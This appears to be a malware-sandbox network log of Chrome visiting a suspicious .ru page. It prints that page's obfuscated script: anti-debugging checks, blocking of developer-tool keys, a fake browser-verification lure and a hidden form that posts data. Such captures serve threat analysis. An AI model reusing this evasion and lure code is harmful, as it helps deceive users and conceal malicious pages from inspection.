                                                                              2025-01-20 13:17:22 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 36 62 46 51 45 33 74 77 43 6b 47 58 44 59 61 42 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 64 62 39 38 32 37 66 66 61 30 34 65 38 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 68 53 5a 7a 46 39 48 51 53 69 41 5a 75 45 6a 45 4c 48 38 44 48 74 69 76 42 5a 55 4f 66 6c 61 2b 2f 6a 6f 6e 43 76 61 77 43 76 4e 62 4e 76 7a 72 4b 33 56 70 2f 7a 6c 7a 41 43 58 78 44 48 4f 63 50 2f 68 4b 6a 73 30 39 32 65 54 62 37 53 79 53 30 71 51 56 53 38 43 78 52 75 66 74 5a 4e 36 78 76 30 5a 4a 31 63 43 39 44 33 72 6c
                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 6bFQE3twCkGXDYaB.2Context: c6db9827ffa04e8c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXhSZzF9HQSiAZuEjELH8DHtivBZUOfla+/jonCvawCvNbNvzrK3Vp/zlzACXxDHOcP/hKjs092eTb7SyS0qQVS8CxRuftZN6xv0ZJ1cC9D3rl
                                                                              2025-01-20 13:17:22 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 36 62 46 51 45 33 74 77 43 6b 47 58 44 59 61 42 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 64 62 39 38 32 37 66 66 61 30 34 65 38 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 6bFQE3twCkGXDYaB.3Context: c6db9827ffa04e8c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                              2025-01-20 13:17:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                              Data Ascii: 202 1 CON 58
                                                                              2025-01-20 13:17:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 47 63 67 4f 4c 71 6f 6c 58 55 53 4a 50 31 6a 61 50 2b 4e 6d 30 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                              Data Ascii: MS-CV: GcgOLqolXUSJP1jaP+Nm0w.0Payload parsing failed.


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.649788188.114.96.34436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:25 UTC686OUTGET /CZ8MDTsC/ HTTP/1.1
                                                                              Host: hbv.julfolusi.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: http://sensoreum.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:26 UTC1243INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: no-cache, private
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EmDzfZxB1oWbRxmZzPS482r9sxOrgHivnaeVizSz0Jo7DBwTNn2aa9rMZntWV8W1lEGjHjenRbvdO5pJ4%2Fr35WTS1udcMgic1C8nAfns%2BgaLu%2FnVvOGajskpD1XQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=73326&min_rtt=73277&rtt_var=27514&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1590&delivery_rate=38866&cwnd=60&unsent_bytes=0&cid=3c41baafe1125e9b&ts=393&x=0"
                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IndzN041cXlTSkpmOWh1RFNQTkJOMVE9PSIsInZhbHVlIjoiYzhqaG1lOGdMTUVray9GNnZYV1A5NThteFJoNEJUenJxVUNDQ01oV21RUU5tZytMUmE4eDRoc1Rsc0V4MTRJOTQwTUt3elVSMUkwZnMvT2xsYlh3TEt6VjlQTmxRcXZWVTIvZFVIOGdrMGE5ems2R3R3ckxBeXpQTVN4eHdNNUYiLCJtYWMiOiIwMGQ5NDlmZjcyN2ZlZDIyYjE5ZGY5NDNiODY4NjNkMDhjOWRmNDI5M2M2NWIyY2ZjOTg0ZmQ4ZTZiZWY1YWM4IiwidGFnIjoiIn0%3D; expires=Mon, 20-Jan-2025 15:17:25 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                              2025-01-20 13:17:26 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 67 34 64 46 70 70 64 30 45 79 54 57 4a 51 57 57 31 4c 4f 54 49 79 4d 47 46 4a 52 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4c 30 6b 33 5a 30 68 49 5a 58 52 72 55 46 56 6f 62 55 39 30 63 47 74 4f 59 7a 56 4b 64 6d 68 6c 5a 47 68 69 64 58 42 68 54 46 6c 75 4c 32 30 76 4d 6e 4a 6a 5a 47 39 71 4f 45 6c 4b 52 45 77 76 55 7a 5a 6f 54 44 46 55 62 44 55 34 61 48 70 68 52 6b 73 76 61 57 70 44 4f 54 6c 55 4e 33 51 78 4d 55 74 5a 65 6e 56 53 65 6d 78 31 4d 47 78 44 4d 46 42 6e 61 32 52 34 4e 47 4a 45 62 45 4a 53 61 6b 6c 4c 56 30 68 45 4b 31 4a 4e 57 58 4e 72 5a 6c 64 6f 5a 6e 41 35 54 32 4e 31 65 55 31 72 52 46 59 7a 59 32 70 54 62 30 45
                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ijg4dFppd0EyTWJQWW1LOTIyMGFJRlE9PSIsInZhbHVlIjoiL0k3Z0hIZXRrUFVobU90cGtOYzVKdmhlZGhidXBhTFluL20vMnJjZG9qOElKREwvUzZoTDFUbDU4aHphRksvaWpDOTlUN3QxMUtZenVSemx1MGxDMFBna2R4NGJEbEJSaklLV0hEK1JNWXNrZldoZnA5T2N1eU1rRFYzY2pTb0E
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 31 35 65 65 0d 0a 3c 21 2d 2d 20 59 6f 75 20 6b 6e 6f 77 20 79 6f 75 20 61 72 65 20 6f 6e 20 74 68 65 20 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 69 66 20 79 6f 75 20 77 6f 75 6c 64 20 64 6f 20 79 6f 75 72 20 6a 6f 62 2c 20 61 6e 64 20 6e 6f 74 20 62 65 20 70 61 69 64 20 66 6f 72 20 69 74 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 44 6f 20 6e 6f 74 20 62 65 20 65 6d 62 61 72 72 61 73 73 65 64 20 62 79 20 79 6f 75 72 20 66 61 69 6c 75 72 65 73 2c 20 6c 65 61 72 6e 20 66 72 6f 6d 20 74 68 65 6d 20 61 6e 64 20 73 74 61 72 74 20 61 67 61 69 6e 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 49 51 6e 59 75 61 6e 56 73 5a 6d 39 73 64 58 4e 70 4c 6e 4a 31 4c 30 4e 61 4f 45 31 45 56 48 4e 44 4c
                                                                              Data Ascii: 15ee... You know you are on the road to success if you would do your job, and not be paid for it. -->... Do not be embarrassed by your failures, learn from them and start again. --><script>if(atob("aHR0cHM6Ly9IQnYuanVsZm9sdXNpLnJ1L0NaOE1EVHNDL
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 57 4e 30 59 57 78 56 52 32 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 63 46 5a 52 59 33 52 68 62 46 56 48 61 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 42 57 55 57 4e 30 59 57 78 56 52 32 67 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 44 5a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73
                                                                              Data Ascii: WN0YWxVR2ggaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojcFZRY3RhbFVHaCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3BWUWN0YWxVR2guY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogODZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgs
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a
                                                                              Data Ascii: RFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZ
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 78 4e 53 6e 56 70 62 6d 74 31 53 30 49 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 46 4a 31 64 32 39 44 5a 58 52 77 63 33 49 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 46 4a 31 64 32 39 44 5a 58 52 77 63 33 49 67 4c 53 42 73 54 55 70 31 61 57 35 72 64 55 74 43 49 44 34 67 56 31 52 6e 63 46 6c 56 52 55 39 59 53 53 41 6d 4a 69 41 68 64 56 52 4b 59 32
                                                                              Data Ascii: 0ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IGxNSnVpbmt1S0IgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IFJ1d29DZXRwc3IgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKFJ1d29DZXRwc3IgLSBsTUp1aW5rdUtCID4gV1RncFlVRU9YSSAmJiAhdVRKY2
                                                                              2025-01-20 13:17:26 UTC146INData Raw: 62 53 35 6a 62 32 30 76 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6c 56 75 61 32 35 76 64 32 34 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 0d 0a
                                                                              Data Ascii: bS5jb20vIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9IlVua25vd24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRh
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 33 38 36 36 0d 0a 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 55 33 52 6b 5a 45 64 34 51 6d 6c 42 53 53 49 2b 44 51 70 57 5a 58 4a 70 5a 6e 6c 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 49 48 52 76 49 48 42 79 62 33 52 6c 59 33 51 67 65 57 39 31 63 69 42 76 62 6d 78 70 62 6d 55 67 59 57 4e 6a 5a 58 4e 7a 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 63
                                                                              Data Ascii: 3866IiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iU3RkZEd4QmlBSSI+DQpWZXJpZnlpbmcgeW91ciBicm93c2VyIHRvIHByb3RlY3QgeW91ciBvbmxpbmUgYWNjZXNzLg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8c
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 6d 51 33 4e 57 53 6b 52 4c 63 57 6c 6d 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 46 71 5a 33 64 68 61 58 70 47 62 55 38 67 50 54
                                                                              Data Ascii: sDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShmQ3NWSkRLcWlmKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGlmKGFqZ3dhaXpGbU8gPT
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 6b 66 6f 46 46 56 75 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 53 62 41 6b 66 6f 46 46 56 75 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 69 64 4d 66 6e 4b 53 64 77 4e 20 3d 3d 20 46 71 74 42 76 4f 47 70 4c 44 29 7b 0d 0a 63 6f 6e 73 74 20 64 6d 6a 4e 70 4e 76 75 4a 58 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 53 62 41 6b 66 6f 46 46 56 75 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 53 62 41 6b 66 6f 46 46 56 75 2e 70 61 74 68 6e 61 6d 65 20 3d 20 53 62 41 6b 66 6f 46 46
                                                                              Data Ascii: kfoFFVu.hostname : SbAkfoFFVu.hostname.split('.').slice(-2).join('.');if(idMfnKSdwN == FqtBvOGpLD){const dmjNpNvuJX = window.location.pathname.split('%23')[0].split('%3F')[0];if (SbAkfoFFVu.pathname.endsWith('/')) {SbAkfoFFVu.pathname = SbAkfoFF
                                                                              2025-01-20 13:17:26 UTC1369INData Raw: 57 78 56 52 32 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 42 57 55 57 4e 30 59 57 78 56 52 32 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 63 46 5a 52 59 33 52 68 62 46 56 48 61 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 42 57 55 57 4e 30 59 57 78 56 52 32 67 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30
                                                                              Data Ascii: WxVR2ggaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3BWUWN0YWxVR2ggaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojcFZRY3RhbFVHaCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3BWUWN0YWxVR2guY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.649805104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:26 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://hbv.julfolusi.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:26 UTC386INHTTP/1.1 302 Found
                                                                              Date: Mon, 20 Jan 2025 13:17:26 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                              cross-origin-resource-policy: cross-origin
                                                                              location: /turnstile/v0/g/672eb098a9f3/api.js
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f58435853de97-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.649804151.101.66.1374436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:26 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                              Host: code.jquery.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://hbv.julfolusi.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:26 UTC613INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 89501
                                                                              Server: nginx
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                              ETag: "28feccc0-15d9d"
                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                              Accept-Ranges: bytes
                                                                              Age: 2863573
                                                                              Date: Mon, 20 Jan 2025 13:17:26 GMT
                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740048-EWR
                                                                              X-Cache: HIT, HIT
                                                                              X-Cache-Hits: 2774, 0
                                                                              X-Timer: S1737379047.937524,VS0,VE1
                                                                              Vary: Accept-Encoding
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
